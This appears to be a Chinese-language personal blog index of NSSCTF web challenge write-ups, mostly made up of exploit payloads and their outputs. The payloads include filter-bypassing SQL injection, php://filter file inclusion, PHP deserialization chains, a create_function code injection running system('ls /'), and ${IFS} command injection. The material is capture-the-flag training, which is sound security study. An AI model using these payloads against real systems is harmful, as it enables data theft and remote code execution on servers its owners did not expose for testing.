wubba lubba dub dub.
post @ 2023-07-11

题目链接

页面内容

1
2
3
4
年轻的Web手啊!
看题目名就知道你该干嘛了吧~
用相对安全的方式传参吧
奥对了参数是nss

参数为nss, GET发送无效; POST nss=1发送成功 返回内容:

1
2
Flag: NSSCTF{This_1s_F4ke_flag}
This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

注入

  • 尝试联合注入

    1
    2
    > nss=-1' union select 1,2%23
    < You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select1,2#' LIMIT 0,1' at line 1

    从报错可以发现空格和union被消除

    尝试绕过 成功

    1
    2
    3
    4
    5
    6
    7
    8
    > nss=-1'/**/ununionion/**/select/**/1,2,3%23
    < Flag: NSSCTF{This_1s_F4ke_flag}
    This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

    # 查看第二行内容
    > nss=-1'/**/ununionion/**/select/**/1,2,3/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: 3
  • 接着常规流程注入

    注意or也会被屏蔽 所以information要更改为infoorrmation

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: NSS_tb,users

    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'/**/limit/**/1,1%23

    < Flag: 2
    This is true flag: id,Secr3t,flll444g


    > nss=-1'/**/ununionion/**/select/**/id,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23

    < Flag: NSSCTF{b3c1613c-6acb-46f4-9510-f3184bd69eb5}
    This is true flag: NSSCTF{I_d0nt_want_t0_w4ke_up}
Read More
post @ 2023-07-11

题目链接

页面源码

1
2
3
4
<?php 
highlight_file(__FILE__);
include($_POST["flag"]);
//flag in /var/www/html/flag.php;

exp

伪协议查看flag

发现被过滤

1
?flag=php://filter/convert.base64-encode/resource=flag.php

查看index源码

当输入长度小于800时 过滤flag

1
2
3
4
5
6
7
8
9
10
11
// ?flag=php://filter/convert.base64-encode/resource=index.php

<?php
$path = $_POST["flag"];
if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
echo 'nssctf waf!';
} else {
@include($path);
}
?>

最后发送字符数>800 然后查看flag

1
a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/convert.base64-encode/resource=flag.php
Read More
post @ 2023-07-11

题目链接

页面源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
error_reporting(0);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}

else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
//flag.php

分析

  1. 提示flag.php
  2. 过滤要求输入为php开头 明显使用伪协议

php伪协议

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
1)file:// 访问本地文件系统

2)http:// 访问HTTP(S)网址

3)ftp:// 访问FTP(S)URL

4)php:// 访问各个输出输入流 php://filter/convert.base64-encode/resource=flag.php

5)zlib:// 处理压缩流

6)data:// 读取数据

7)glob:// 查找匹配的文件路径模式

8)phar:// PHP归档

9)rar:// RAR数据压缩

exp

1
2
3
4
?file=php://filter/convert.base64-encode/resource=flag.php
// 获得base64 解码后提示flag在flag文件中
?file=php://filter/convert.base64-encode/resource=flag
// 获得flag
Read More
post @ 2023-07-09

题目链接

页面源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
error_reporting(0);
show_source("index.php");
class w44m {
private $admin = 'w44m';
protected $passwd = '08067';

public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php'); // [1]
echo $flag;
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m; // [3]
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}(); // [2]
return 0;
}
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?>

分析

  1. 目标肯定为执行echo $flag;
  2. 要能执行 [1] 需找到Getflag的可能调用,由此定位到 [2] 令w22m=Getflag字符串即可
  3. 要能执行__toString需找到将类当作字符串使用的地方,由此定位到 [3]

exp

逆序构造

  1. 创建w22m对象 其中$w00m字段为w33m对象

  2. 创建w33m对象 其中$w00m为w44m对象 $w22m为Getflag字符串

  3. 创建w44m对象 其中$admin = ‘w44m’;$passwd = ‘08067’;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
error_reporting(0);
show_source("index.php");

class w44m {
private $admin = 'w44m';
protected $passwd = '08067';
}

class w22m{
public $w00m;
}

class w33m{
public $w00m;
public $w22m="Getflag";
}

$a=new w22m;
$b=new w33m;
$b->w00m=new w44m;
$a->w00m=$b;

echo serialize($a) . "\n";
echo urlencode(serialize($a)) . "\n";

// ?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
Read More
post @ 2023-07-08

题目链接

页面源码

  • 关键点: unserialize($this->key)();
  • 做题做魔怔了 一开始就在想类对象加括号是调用了什么 实际上字符串也可以被序列化&反序列化
  • 若将”phpinfo”序列化后传输 则会执行 phpinfo();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
error_reporting(0);
highlight_file(__FILE__);
$pwd=getcwd();
class func {
public $mod1;
public $mod2;
public $key;
public function __destruct() {
unserialize($this->key)();
$this->mod2 = "welcome ".$this->mod1;
}
}

class GetFlag {
public $code;
public $action;
public function get_flag(){
$a=$this->action;
$a('', $this->code);
}
}
unserialize($_GET[0]);
?>

尝试执行phpinfo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php

class func
{
public $mod1 = "a";
public $mod2 = "b";
public $key;
}

class GetFlag
{ public $code;
public $action;
}
$a = new func;
$a -> key = serialize("phpinfo");

echo serialize($a) . "\n";
# O:4:"func":3:{s:4:"mod1";s:1:"a";s:4:"mod2";s:1:"b";s:3:"key";s:14:"s:7:"phpinfo";";}
# 传输 ?0=O:4:"func":3:{s:4:"mod1";s:1:"a";s:4:"mod2";s:1:"b";s:3:"key";s:14:"s:7:"phpinfo";";} 成功调用phpinfo

php数组特性

当一个数组被当作函数调用时 如果数组第一个元素为类对象 第二个元素为这个对象内的方法名 那么就会调用该对象下的该方法

思路:

  1. 让 $a->key=serialize([new GetFlag, “get_flag”])
  2. 设置$action为create_function 并构造code 执行

create_function

功能

create_function()会创建一个匿名函数(lambda_样式)函数名是以lambda开头的一个自增的函数名

1
2
3
4
5
6
7
8
create_function('$a, $b','echo ($a+$b);'); //返回lambda_1
//等效于
function lambda_1($a,$b){
echo ($a+$b);
}

$f= create_function('$a, $b','echo ($a+$b);');
$f(1, 2); // 3

底层实现

对用户传入参数function_args,function_code进行拼接构造

1
2
3
function  __lambda_func ( function_args ) { function_code } \0;
# 如果可控在第一个参数,需要闭合圆括号和大括号: create_function('){}phpinfo();//', '');
# 如果可控在第二个参数,需要闭合大括号: create_function('', '}phpinfo();//');

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

class func
{
public $mod1 = "a";
public $mod2 = "b";
public $key;
}

class GetFlag
{ public $code = ';}system("ls /");//';
public $action = "create_function";
}
$a = new func;
$a->key= serialize([new GetFlag, "get_flag"]);

echo serialize($a) . "\n";
# O:4:"func":3:{s:4:"mod1";s:1:"a";s:4:"mod2";s:1:"b";s:3:"key";s:121:"a:2:{i:0;O:7:"GetFlag":2:{s:4:"code";s:19:";}system("ls /");//";s:6:"action";s:15:"create_function";}i:1;s:8:"get_flag";}";}
Read More
post @ 2023-07-08

题目链接

页面源码

屏蔽字母和若干符号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm'])) {
$wllm = $_GET['wllm'];
$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $wllm)) {
die("LTLT说不能用这些奇奇怪怪的符号哦!");
}
}
if(preg_match('/[a-zA-Z]/is',$wllm)) {
die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else {
echo "蔡总说:注意审题!!!";
}
?>

url编码取反绕过

1
2
3
4
5
6
<?php
$a="system";
echo "~" . urlencode(~$a) . "\n";

# system: ~%8C%86%8C%8B%9A%92
# ls: ~%93%8C

构造发送

1
?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C);	# 相当于system(ls);
Read More
post @ 2023-07-07

题目链接

页面源码

明显反序列化漏洞 但是反序列化会自动调用__wakup()函数 进行sha1加密 难以逆转

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
public $admin;
public $passwd;

public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}

public function __wakeup(){
$this->passwd = sha1($this->passwd);
}

public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

绕过wakeup

php特性:当序列化后对象的参数列表中成员个数和实际个数不符合时不调用 __weakup()

1
2
3
4
5
6
7
8
9
10
11
<?php
class HaHaHa{
public $admin = "admin";
public $passwd = "wllm";
}

echo serialize(new HaHaHa) . "\n";

# O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# 将个数2改为3 得到 O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# 发送得到flag
Read More
post @ 2023-07-06

题目链接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# 空格和等号都被过滤 
# 空格替换为 /**/
# 等号替换为 like

# 查看列数、数据库名
?wllm=-1'order/**/by/**/3%23
?wllm=-1'union/**/select/**/1,2,database()%23

# 查看表名发现有LTLT_flag
?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/'test_db'%23

# 查看LTLT_flag中列名发现有flag
?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23

# 查看flag 但是发现有长度截取
?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23

# substr substring right reverse都被屏蔽 发现mid可用(相当于substr) 一组组获取flag
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23
Read More
post @ 2023-07-06

题目链接

页面内容

1
2
3
4
5
6
7
8
9
10
11
 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if($_COOKIE['admin']==1)
{
include "../next.php";
}
else
echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

设置cookie

1
2
3
4
5
6
7
import requests

cookie = {"admin": "1"}
response = requests.get("http://node1.anna.nssctf.cn:28246/", cookies=cookie)
print(response.text)

# 得到 rasalghul.php

访问rasalghul.php 有

1
2
3
4
5
6
7
8
9
10
11
12
<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET['url'])) {
$ip=$_GET['url'];
if(preg_match("/ /", $ip)){
die('nonono');
}
$a = shell_exec($ip);
echo $a;
}

代码执行 空格绕过得到flag

1
?url=cat${IFS}/flllllaaaaaaggggggg;

补充 [空格绕过]:

1
2
3
4
5
6
7
8
$IFS
${IFS}
$IFS$9
{cat,flag.php}
<
>
%20
%09
Read More
post @ 2023-07-05

题目链接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
> ?wllm=1'	# 尝试看看是否为sql查询
< You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
# 说明确实为MariaDB sql查询且存在注入漏洞

> ?wllm=1' order by 3--+
< Your Login name:xxx
Your Password:yyy # 正常
> ?wllm=1' order by 4--+
< Unknown column '4' in 'order clause' # 异常
# 说明读取列数为3,接着联合查询

> ?wllm=1' union select 1,2,3--+
< Your Login name:xxx
Your Password:yyy # 正常
> ?wllm=1' union select 1,2,3 limit 1,1--+ # 取第一行
< Your Login name:2
Your Password:3 # 说明Loginname为第二字段 password为第三字段

# 获取database名
> ?wllm=1' union select 1,2,database() limit 1,1--+
< Your Login name:2
Your Password:test_db

# 获取tables
> ?wllm=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' limit 1,1--+
< Your Login name:2
Your Password:test_tb,users

# 获取columns
> ?wllm=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' limit 1,1--+
< Your Login name:2
Your Password:id,flag

# 获取flag
> ?wllm=1' union select 1,2,flag from test_db.test_tb limit 1,1--+
< Your Login name:2
Your Password:NSSCTF{85fe17d6-6beb-479d-a957-c69fb83d8217}
Read More
⬆︎TOP